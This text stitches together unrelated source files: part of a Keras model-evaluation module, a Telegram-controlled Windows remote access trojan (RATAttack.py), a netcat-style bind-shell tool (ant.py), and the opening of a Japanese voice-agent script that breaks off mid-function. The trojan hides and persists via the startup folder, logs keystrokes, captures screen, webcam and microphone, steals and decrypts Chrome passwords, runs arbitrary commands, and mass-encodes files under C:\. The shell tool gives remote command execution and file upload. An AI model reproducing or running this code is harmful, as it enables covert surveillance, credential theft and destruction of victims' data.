'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
batch_size = len(x[0])
elif isinstance(x, dict):
batch_size = len(list(x.values())[0])
else:
batch_size = len(x)
all_outs.append(outs)
steps_done += 1
batch_sizes.append(batch_size)
finally:
if enqueuer is not None:
enqueuer.stop()
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=batch_sizes)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=batch_sizes))
return averages
@interfaces.legacy_generator_methods_support
def predict_generator(self, generator, steps,
max_q_size=10, workers=1,
pickle_safe=False, verbose=0):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: Generator yielding batches of input samples.
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: Maximum size for the generator queue.
workers: Maximum number of processes to spin up
when using process based threading
pickle_safe: If `True`, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case the generator yields
data in an invalid format.
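# Example
An illustrative sketch; `pred_gen()` is a placeholder generator that
yields input batches only, for a model with a 10-dimensional input:
```python
import numpy as np

def pred_gen():
    while True:
        yield np.random.random((16, 10))

preds = model.predict_generator(pred_gen(), steps=20)
```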
"""
self._make_predict_function()
steps_done = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
if verbose == 1:
progbar = Progbar(target=steps)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
# Compatibility with the generators
# used for training.
if len(generator_output) == 2:
x, _ = generator_output
elif len(generator_output) == 3:
x, _, _ = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
else:
# Assumes a generator that only
# yields inputs (not targets and sample weights).
x = generator_output
outs = self.predict_on_batch(x)
if not isinstance(outs, list):
outs = [outs]
if not all_outs:
for out in outs:
all_outs.append([])
for i, out in enumerate(outs):
all_outs[i].append(out)
steps_done += 1
if verbose == 1:
progbar.update(steps_done)
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
if steps_done == 1:
return all_outs[0][0]
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
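# Illustrative usage sketch for `predict_generator`; `model` and
# `make_input_batches()` are hypothetical placeholders for a compiled model
# and a generator yielding input batches only:
#
#     preds = model.predict_generator(make_input_batches(), steps=100,
#                                     verbose=1)
#     # For a single-output model this is one Numpy array containing the
#     # predictions from all steps, concatenated along the batch axis.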
|
RATAttack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, os.path, platform, ctypes
os.environ["PBR_VERSION"]='5.0.0'
import logging
from consoleTools import consoleDisplay as cd
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
from time import strftime, sleep
from subprocess import Popen, PIPE # /cmd_exec
import psutil # updating
import shutil
import win32clipboard # register clipboard
import sqlite3 # get chrome passwords
import win32crypt # get chrome passwords
import base64 # /encrypt_all
import datetime # /schedule
import time
import threading # /proxy, /schedule
import proxy
import pyaudio, wave # /hear
import telepot, requests # telepot => telegram, requests => file download
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
import pyHook, pythoncom # keylogger
import socket # internal IP
import getpass # get username
import collections
import urllib # wallpaper
import cv2 # webcam
from datetime import datetime
from ctypes import * # fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145
cd.log('i','Starting')
me = singleton.SingleInstance()
# REPLACE THE LINE BELOW WITH THE TOKEN OF THE BOT YOU GENERATED!
token = 'xx:xx'
if 'RVT_TOKEN' in os.environ: # it can also be set as an environment variable
token = os.environ['RVT_TOKEN']
# This will be used for setting paths and related file io -- change to whatever you want
app_name = 'ABCdef123'
# ADD YOUR chat_id IN STRING FORMAT TO THE LIST BELOW IF YOU WANT YOUR BOT TO ONLY RESPOND TO ONE PERSON!
known_ids = []
#known_ids.append(os.environ['TELEGRAM_CHAT_ID']if 'TELEGRAM_CHAT_ID' in os.environ) # make sure to remove this line if you don't have this environment variable
appdata_roaming_folder = os.environ['APPDATA'] # = 'C:\Users\Username\AppData\Roaming'
# HIDING OPTIONS
# ---------------------------------------------
hide_folder = appdata_roaming_folder + '\\' + app_name # = 'C:\Users\Username\AppData\Roaming\Portal'
compiled_name = app_name + '.exe' # Name of compiled .exe to hide in hide_folder, i.e 'C:\Users\Username\AppData\Roaming\Portal\portal.exe'
# ---------------------------------------------
target_shortcut = startup() + '\\' + compiled_name.replace('.exe', '.lnk')
if not os.path.exists(hide_folder):
os.makedirs(hide_folder)
hide_compiled = hide_folder + '\\' + compiled_name
copyfile(argv[0], hide_compiled)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(target_shortcut)
shortcut.Targetpath = hide_compiled
shortcut.WorkingDirectory = hide_folder
shortcut.save()
if not os.path.exists('logs/'):
os.mkdir('logs/')
if not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):
f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))
f.close()
global mouseFrozen
destroy = False
keyboardFrozen = False
mouseFrozen = False
curr_window = None
user = os.environ.get("USERNAME") # Windows username to append keylogs
schedule = {}
log_file = hide_folder + '\\.user'
keylogs_file = hide_folder + '\\.keylogs'
with open(log_file, "a") as writing:
writing.write("-------------------------------------------------\n")
writing.write(user + " Log: " + strftime("%b %d@%H:%M") + "\n\n")
logging.basicConfig(filename=log_file,level=logging.DEBUG)
def encode(file):
f = open(file)
data = f.read()
f.close()
encodedBytes = base64.b64encode(data)
#remove old file
os.remove(file)
#tag new file
file = file + '.nxr'
t = open(file, "w+")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
decodedBytes = base64.b64decode(data)
#remove old file
os.remove(file)
#tag new file
file = file.replace('.nxr', '')
t = open(file, "w+")
t.write(decodedBytes)
t.close()
def runStackedSchedule(everyNSeconds):
for k in schedule.keys():
if k < datetime.datetime.now():
handle(schedule[k])
del schedule[k]
threading.Timer(everyNSeconds, runStackedSchedule).start()
def internalIP():
internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
internal_ip.connect(('google.com', 0))
return internal_ip.getsockname()[0]
def checkchat_id(chat_id):
return len(known_ids) == 0 or str(chat_id) in known_ids
def get_curr_window():
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = ctypes.c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
process_id = "%d" % pid.value
executable = ctypes.create_string_buffer(512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
ctypes.windll.psapi.GetModuleBaseNameA(h_process, None, ctypes.byref(executable), 512)
window_title = ctypes.create_string_buffer(512)
length = user32.GetWindowTextA(hwnd, ctypes.byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def false_event(event):
return False
def true_event(event):
return True
def pressed_chars(event):
data = None
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(keylogs_file, 'a')
data = get_curr_window()
fp.write(data + "\n")
fp.close()
if event and type(event.Ascii) == int:
f = open(keylogs_file,"a")
if len(event.GetKey()) > 1:
tofile = '<'+event.GetKey()+'>'
else:
tofile = event.GetKey()
if tofile == '<Return>':
print(tofile)
else:
stdout.write(tofile)
f.write(tofile)
f.close()
return not keyboardFrozen
def split_string(n, st):
lst = ['']
for i in str(st):
l = len(lst) - 1
if len(lst[l]) < n:
lst[l] += i
else:
lst += [i]
return lst
def send_safe_message(bot, chat_id, message):
while(True):
try:
cd.log('n','Message sent:\n{}'.format(bot.sendMessage(chat_id, message)),True)
break
except:
pass
def handle(msg):
chat_id = msg['chat']['id']
if checkchat_id(chat_id):
response = ''
if 'text' in msg:
cd.log('n','\n\t\tGot message from ' + str(chat_id) + ': ' + msg['text'] + '\n\n',True)
command = msg['text']
try:
if command == '/arp':
response = ''
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('arp -a -N ' + internalIP())
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command == '/capture_webcam':
bot.sendChatAction(chat_id, 'typing')
camera = cv2.VideoCapture(0)
while True:
return_value,image = camera.read()
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
cv2.imshow('image',gray)
if cv2.waitKey(1)& 0xFF == ord('s'):
cv2.imwrite('webcam.jpg',image)
break
camera.release()
cv2.destroyAllWindows()
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))
os.remove('webcam.jpg')
elif command == '/capture_pc':
bot.sendChatAction(chat_id, 'typing')
screenshot = ImageGrab.grab()
screenshot.save('screenshot.jpg')
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))
os.remove('screenshot.jpg')
elif command.startswith('/cmd_exec'):
cd.log('w','Command exec prep')
process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)
command = command.replace('/cmd_exec', '')
cd.log('w','Executing the command '+command)
if len(command) > 1:
process.stdin.write(bytes(command + '\n'))
process.stdin.close()
lines = process.stdout.readlines()
for l in lines:
response += l
else:
response = '/cmd_exec dir'
elif command.startswith('/cd'):
command = command.replace('/cd ','')
try:
os.chdir(command)
response = os.getcwd() + '>'
except:
response = 'No subfolder matching ' + command
elif command.startswith('/delete'):
command = command.replace('/delete', '')
path_file = command.strip()
try:
os.remove(path_file)
response = 'Succesfully removed file'
except:
try:
os.rmdir(path_file)
response = 'Succesfully removed folder'
except:
try:
shutil.rmtree(path_file)
response = 'Succesfully removed folder and it\'s files'
except:
response = 'File not found'
elif command == '/dns':
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('ipconfig /displaydns')
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command.startswith('/download'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/download', '')
path_file = path_file[1:]
if path_file == '':
response = '/download C:/path/to/file.name or /download file.name'
else:
bot.sendChatAction(chat_id, 'upload_document')
try:
bot.sendDocument(chat_id, open(path_file, 'rb'))
except:
try:
bot.sendDocument(chat_id, open(hide_folder + '\\' + path_file))
response = 'Found in hide_folder: ' + hide_folder
except:
response = 'Could not find ' + path_file
elif command.endswith('code_all'):
cd.log('w','Data encryption option.')
parentDirectory = 'C:\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if command.startswith('/en'):
cd.log('w','WARNING ABOUT TO ENCRYPT DATA!!!! IN '+str(full_path))
encode(full_path)
elif command.startswith('/de') and full_path.endswith('.nxr'):#our extension (been encoded)
decode(full_path)
response = 'Files ' + command[1:3] + 'coded succesfully.'
elif command.startswith('/cp'):
command = command.replace('/cp', '')
command = command.strip()
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
copyfile(file1, file2)
response = 'Files copied succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/cp "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command.endswith('freeze_keyboard'):
global keyboardFrozen
keyboardFrozen = not command.startswith('/un')
hookManager.KeyAll = lambda event: not keyboardFrozen
response = 'Keyboard is now '
if keyboardFrozen:
response += 'disabled. To enable, use /unfreeze_keyboard'
else:
cd.log('w','Keyboard frozen')
response += 'enabled'
elif command.endswith('freeze_mouse'):
if mouseFrozen == False:
mse = pyHook.HookManager()
mse.MouseAll = false_event
mse.KeyAll = false_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'enabled. To disable use /unfreeze_mouse'
elif mouseFrozen == True:
cd.log('w','Keyboard frozen')
response += 'enabled. To disable, use /unfreeze_mouse'
else:
response += 'The script has commited the act of death'
elif command.endswith('unfreeze_mouse'):
if mouseFrozen == True:
mse = pyHook.HookManager()
mse.MouseAll = true_event
mse.KeyAll = true_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'disabled. To enable use /freeze_mouse'
elif mouseFrozen == False:
response += 'already disabled. To enable, use /freeze_mouse'
else:
response += 'The script has commited the act of death'
elif command == '/get_chrome':
con = sqlite3.connect(os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data')
cursor = con.cursor()
cursor.execute("SELECT origin_url,username_value,password_value from logins;")
for users in cursor.fetchall():
response += 'Website: ' + users[0] + '\n'
response += 'Username: ' + users[1] + '\n'
response += 'Password: ' + str(win32crypt.CryptUnprotectData(users[2], None, None, None, 0)) + '\n\n'
# """
# pass
elif command.startswith('/hear'):
try:
SECONDS = -1
try:
SECONDS = int(command.replace('/hear','').strip())
except:
SECONDS = 5
CHANNELS = 2
CHUNK = 1024
FORMAT = pyaudio.paInt16
RATE = 44100
audio = pyaudio.PyAudio()
bot.sendChatAction(chat_id, 'typing')
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
audio.terminate()
wav_path = hide_folder + '\\mouthlogs.wav'
waveFile = wave.open(wav_path, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
bot.sendChatAction(chat_id, 'upload_document')
except OSError:
cd.log('e','Unable to listen in - there is probably no input device.')
response = 'unable to listen in - there is probably no input device'
#bot.sendAudio(chat_id, audio=open(wav_path, 'rb'))
elif command == '/ip_info':
bot.sendChatAction(chat_id, 'find_location')
info = requests.get('http://ipinfo.io').text #json format
location = (loads(info)['loc']).split(',')
bot.sendLocation(chat_id, location[0], location[1])
import string
import re
response = 'External IP: '
response += "".join(filter(lambda char: char in string.printable, info))
response = re.sub('[:,{}\t\"]', '', response)
response += '\n' + 'Internal IP: ' + '\n\t' + internalIP()
elif command == '/keylogs':
bot.sendChatAction(chat_id, 'upload_document')
bot.sendDocument(chat_id, open(keylogs_file, "rb"))
elif command.startswith('/ls'):
bot.sendChatAction(chat_id, 'typing')
command = command.replace('/ls', '')
command = command.strip()
files = []
if len(command) > 0:
files = os.listdir(command)
else:
files = os.listdir(os.getcwd())
human_readable = ''
for file in files:
human_readable += file + '\n'
response = human_readable
elif command.startswith('/msg_box'):
message = command.replace('/msg_box', '')
if message == '':
response = '/msg_box yourText'
else:
ctypes.windll.user32.MessageBoxW(0, message, u'Information', 0x40)
response = 'MsgBox displayed'
elif command.startswith('/mv'):
command = command.replace('/mv', '')
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
move(file1, file2)
response = 'Files moved succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/mv "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command == '/pc_info':
bot.sendChatAction(chat_id, 'typing')
info = ''
for pc_info in platform.uname():
info += '\n' + pc_info
info += '\n' + 'Username: ' + getpass.getuser()
response = info
elif command == '/ping':
response = platform.uname()[1] + ': I\'m up'
elif command.startswith('/play'):
command = command.replace('/play', '')
command = command.strip()
if len(command) > 0:
systemCommand = 'start \"\" \"https://www.youtube.com/embed/'
systemCommand += command
systemCommand += '?autoplay=1&showinfo=0&controls=0\"'
if os.system(systemCommand) == 0:
response = 'YouTube video is now playing'
else:
response = 'Failed playing YouTube video'
else:
response = '/play <VIDEOID>\n/play A5ZqNOJbamU'
elif command == '/proxy':
threading.Thread(target=proxy.main).start()
info = requests.get('http://ipinfo.io').text #json format
ip = (loads(info)['ip'])
response = 'Proxy succesfully setup on ' + ip + ':8081'
elif command == '/pwd':
response = os.getcwd()
elif command.startswith('/python_exec'):
command = command.replace('/python_exec','').strip()
if len(command) == 0:
response = 'Usage: /python_exec print(\'printing\')'
else:
cd.log('w','Executing python command')
# from StringIO import StringIO
# import sys
# old_stderr = sys.stderr
# old_stdout = sys.stdout
# sys.stderr = mystderr = StringIO()
# sys.stdout = mystdout = StringIO()
# exec(command in globals())
# if mystderr.getvalue() != None:
# response += mystderr.getvalue()
# if mystdout.getvalue() != None:
# response += mystdout.getvalue()
# sys.stderr = old_stderr
# sys.stdout = old_stdout
if response == '':
response = 'Expression executed. No return or malformed expression.'
elif command == '/reboot':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /r /f /t 0')
response = 'Computer will be restarted NOW.'
elif command.startswith('/run'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/run', '')
path_file = path_file[1:]
if path_file == '':
response = '/run_file C:/path/to/file'
else:
try:
os.startfile(path_file)
response = 'File ' + path_file + ' has been run'
except:
try:
os.startfile(hide_folder + '\\' + path_file)
response = 'File ' + path_file + ' has been run from hide_folder'
except:
response = 'File not found'
elif command.startswith('/schedule'):
command = command.replace('/schedule', '')
if command == '':
response = '/schedule 2017 12 24 23 59 /msg_box happy christmas'
else:
scheduleDateTimeStr = command[1:command.index('/') - 1]
scheduleDateTime = datetime.datetime.strptime(scheduleDateTimeStr, '%Y %m %d %H %M')
scheduleMessage = command[command.index('/'):]
schedule[scheduleDateTime] = {'text' : scheduleMessage, 'chat' : { 'id' : chat_id }}
response = 'Schedule set: ' + scheduleMessage
runStackedSchedule(10)
elif command == '/self_destruct':
bot.sendChatAction(chat_id, 'typing')
global destroy
destroy = True
response = 'You sure? Type \'/destroy\' to proceed.'
elif command == '/shutdown':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /s /f /t 0')
response = 'Computer will be shutdown NOW.'
elif command == '/destroy' and destroy == True:
bot.sendChatAction(chat_id, 'typing')
if os.path.exists(hide_folder):
rmtree(hide_folder)
if os.path.isfile(target_shortcut):
os.remove(target_shortcut)
os._exit(0)
elif command == '/tasklist':
lines = os.popen('tasklist /FI \"STATUS ne NOT RESPONDING\"')
response2 = ''
for line in lines:
line.replace('\n\n', '\n')
if len(line)>2000:
response2 +=line
else:
response += line
response += '\n' + response2
elif command.startswith('/to'):
command = command.replace('/to','')
import winsound
winsound.Beep(440, 300)
if command == '':
response = '/to <COMPUTER_1_NAME>, <COMPUTER_2_NAME> /msg_box Hello HOME-PC and WORK-PC'
else:
targets = command[:command.index('/')]
if platform.uname()[1] in targets:
command = command.replace(targets, '')
msg = {'text' : command, 'chat' : { 'id' : chat_id }}
handle(msg)
elif command == '/update':
proc_name = app_name + '.exe'
if not os.path.exists(hide_folder + '\\updated.exe'):
response = 'Send updated.exe first.'
else:
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == proc_name:
proc.kill()
os.rename(hide_folder + '\\' + proc_name, hide_folder + '\\' + proc_name + '.bak')
os.rename(hide_folder + '\\updated.exe', hide_folder + '\\' + proc_name)
os.system(hide_folder + '\\' + proc_name)
sys.exit()
elif command.startswith('/wallpaper'):
command = command.replace('/wallpaper', '')
command = command.strip()
if len(command) == 0:
response = 'Usage: /wallpaper C:/Users/User/Desktop/porn.jpg'
elif command.startswith('http'):
image = command.rsplit('/',1)[1]
image = hide_folder + '/' + image
urllib.urlretrieve(command, image)
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoW(20, 0, command.replace('/', '//'), 3)
response = 'Wallpaper succesfully set.'
elif command == '/help':
# functionalities dictionary: command:arguments
functionalities = { '/arp' : '', \
'/capture_pc' : '', \
'/cmd_exec' : '<command_chain>', \
'/cd':'<target_dir>', \
'/decode_all':'', \
'/delete':'<target_file>', \
'/dns':'', \
'/download':'<target_file>', \
'/encode_all':'', \
'/freeze_keyboard':'', \
'/freeze_mouse':'', \
'/get_chrome':'', \
'/hear':'[time in seconds, default=5s]', \
'/ip_info':'', \
'/keylogs':'', \
'/ls':'[target_folder]', \
'/msg_box':'<text>', \
'/pc_info':'', \
'/play':'<youtube_videoId>', \
'/proxy':'', \
'/pwd':'', \
'/python_exec':'<command_chain>', \
'/reboot':'', \
'/run':'<target_file>', \
'/self_destruct':'', \
'/shutdown':'', \
'/tasklist':'', \
'/to':'<target_computer>, [other_target_computer]',\
'/update':'',\
'/wallpaper':'<target_file>'}
response = "\n".join(command + ' ' + description for command,description in sorted(functionalities.items()))
else: # redirect to /help
cd.log('w','BOT MISUSE: Invalid command')
msg = {'text' : '/help', 'chat' : { 'id' : chat_id }}
handle(msg)
except Exception as e:
cd.log('e','BOT MISUSE: Unknown error running command or function.')
cd.log('z','Details from previous error'+str(e))
#raise
cd.log('n','Command {} ran'.format(command))
else: # Upload a file to target
file_name = ''
file_id = None
if 'document' in msg:
file_name = msg['document']['file_name']
file_id = msg['document']['file_id']
elif 'photo' in msg:
file_time = int(time.time())
file_id = msg['photo'][1]['file_id']
file_name = file_id + '.jpg'
file_path = bot.getFile(file_id=file_id)['file_path']
link = 'https://api.telegram.org/file/bot' + str(token) + '/' + file_path
file = (requests.get(link, stream=True)).raw
with open(hide_folder + '\\' + file_name, 'wb') as out_file:
copyfileobj(file, out_file)
response = 'File saved as ' + file_name
if response != '':
responses = split_string(4096, response)
for resp in responses:
send_safe_message(bot, chat_id, resp)#
if token == 'xx:xx': cd.log('e','Token has not been set, open up RATAttack.py and change the token - then recompile (if applicable).'); raise Exception('Token not set')
cd.log('s','Setup done')
cd.log('i','Starting')
bot = telepot.Bot(token)
bot.message_loop(handle)
if len(known_ids) > 0:
helloWorld = platform.uname()[1] + ": I'm up."
for known_id in known_ids: send_safe_message(bot, known_id, helloWorld)
print(helloWorld)
cd.log('s','Started')
cd.log('i','Listening for commands on ' + platform.uname()[1] + '...')
hookManager = pyHook.HookManager()
hookManager.KeyDown = pressed_chars
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
ant.py
|
#!/bin/python3
#
# Arm0red Net Tool
# ant.py
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print("arm0red Net Tool")
print()
print("Usage: ant.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving connaction upload a file and write to destination")
print()
print()
print("Examples: ")
print("ant.py -l -p 5555 -c")
print("ant.py -t 192.168.1.23 -p 5555 -l -u=c:\\target.exe")
print("arnt.py -t 192.168.1.45 -p 5555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' | ./ant.py -t 192.168.1.67 -p 8910")
sys.exit(0)
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
if len(buffer):
client.send(bytes(str(buffer), "UTF-8"))
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode("UTF-8")
if recv_len < 4096:
break
print(response,)
# wait for more input
buffer = input("")
buffer += "\n"
# send it off
client.send(bytes(str(buffer), "UTF-8"))
except Exception as e:
print("[*] Exception! Exiting.")
print(e)
# tear down the connection
client.close()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send(bytes(str("Successfully saved file to %s\r\n" % upload_destination), "UTF-8"))
except:
client_socket.send(bytes(str("Failed to save file to %s\r\n" % upload_destination), "UTF-8"))
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(bytes(str(output), "UTF-8"))
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send(bytes(str("<ANT:#> "), "UTF-8"))
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode("UTF-8")
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(bytes(str(response) + "\n", "UTF-8"))
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:", ["help","listen","execute=","target=","port=","command","upload="])
except getopt.GetoptError as err:
print(str(err))
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e","--execute"):
execute = a
elif o in ("-c","--commandshell"):
command = True
elif o in ("-u","--upload"):
upload_destination = a
elif o in ("-t","--target"):
target = a
elif o in ("-p","--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
listen_user.py
|
import abc
from asyncio.queues import QueueEmpty
import json
import os
import threading
import time
import numpy as np
from sentence_transformers import SentenceTransformer
from onnx_sentence_transformers import ONNXSentenceTransformer
import simpleaudio as sa
import speech_recognition as sr
import yaml
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_watson import SpeechToTextV1
from tsukuyomichan_talksoft import TsukuyomichanTalksoft
from bert_agent import EmbeddingBasedReplyAgent
from yamnet import HumanVoiceDetector
import librosa
from espnet_model_zoo.downloader import ModelDownloader
from espnet2.bin.asr_inference import Speech2Text
import random
class TsukuyomichanAgent:
MAX_WAV_VALUE = 32768.0
fs = 24000
def __init__(self):
self.r = sr.Recognizer()
self.speech = sr.Microphone(sample_rate=16000)
self.talksoft = TsukuyomichanTalksoft(model_version='v.1.2.0')
self.voice_detector = HumanVoiceDetector()
use_many_cpu_as_possible = False
if use_many_cpu_as_possible:
self.sentence_transformer = ONNXSentenceTransformer()
else:
# self.sentence_transformer = SentenceTransformer("paraphrase-multilingual-mpnet-base-v2")
self.sentence_transformer = SentenceTransformer("paraphrase-multilingual-MiniLM-L12-v2")
d = ModelDownloader()
aaa = d.download_and_unpack("kan-bayashi/csj_asr_train_asr_transformer_raw_char_sp_valid.acc.ave")
print(aaa)
self.speech2text = Speech2Text(
**aaa,
device="cuda"
)
def speak(self, reply, seed=None):
if seed is None:
seed = random.randint(0,1000)
print(f"Speaking {reply}")
wav = self.talksoft.generate_voice(reply, seed)
wav = wav * self.MAX_WAV_VALUE
wav = wav.astype(np.int16)
play_obj = sa.play_buffer(wav, 1, 2, self.fs)
play_obj.wait_done()
def listen_voice_event(self):
return self.voice_detector.wait_for_human_voice()
def recognize_talk(self, timeout=None):
with self.speech as source:
print("start listening")
self.r.adjust_for_ambient_noise(source)  # calibrates in place; its return value is None
try:
audio_file = self.r.listen(source, timeout=timeout)
except sr.WaitTimeoutError:
return None
print("start recognization")
sentence = self.speech2text(librosa.util.buf_to_float(audio_file.get_wav_data(), n_bytes=2, dtype=np.int16))[0][0]
print(sentence)
return sentence
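# The method below embeds the recognized utterance and each candidate
# sentence with the sentence transformer and returns the candidate with the
# smallest Euclidean distance, provided it is under MAX_ACCEPTABLE_DISTANCE.
# Illustrative call (the candidate strings are placeholders):
#
#     choice = agent.wait_for_one_of_in_similar_meaning(["はい", "いいえ"],
#                                                        timeout=5)
#     if choice is None:
#         pass  # nothing recognized, or nothing close enough in meaning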
def wait_for_one_of_in_similar_meaning(self, sentences, timeout=None):
user_talk = self.recognize_talk(timeout)
if not user_talk:
return None
user_embedding = self.sentence_transformer.encode(user_talk)
